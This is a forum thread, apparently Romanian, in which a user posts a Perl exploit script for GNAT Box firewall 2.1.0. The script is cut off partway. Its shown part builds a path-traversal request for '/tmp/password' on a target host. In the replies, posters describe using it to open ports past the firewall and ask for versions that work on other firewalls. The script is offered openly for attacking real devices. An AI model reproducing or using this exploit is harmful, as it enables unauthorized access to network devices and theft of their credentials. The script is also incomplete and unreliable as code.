Jump to content
mario23

AntiFireWall

Recommended Posts

#!/usr/bin/perl -w

# usage: <host>    

# tested on: GNAT Box Version: 2.1.0    

#                                      

##########################################

use Socket; use strict;

if (@ARGV < 1) {

   print("[ElectronicSouls] gnatbox Firewall Exploit n");

   print(" © BrainStorm nn");

   print("Usage: $0 <host> n");

   exit(1);

}

my ($host, $exploit, $ipadd, $pad, $protocol, $response);

$host = @ARGV;

$exploit  = "GET /../../tmp/password HTTP/1.0

Link to comment
Share on other sites

<div class='quotetop'>QUOTE("Criminal")</div>

antifirewall...te pot intreba ce face? cum il " inchide "?

mai bine il intrebi pe ala e l-a facut, poate iti explica mai bine ca mine.

Daca gasesti un GNAT BOX poate il incerci si tu si ai sa vezi cum il "opreste" :).

Iar asta nu il opreste doar iti da tie posibilitatea sa folosesti un port anume chiar si cu firewallu activat.

Poate se gaseste un baiat meserias sa il modifice si pentru alte tipuri de firewall si ni-l da si noua

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...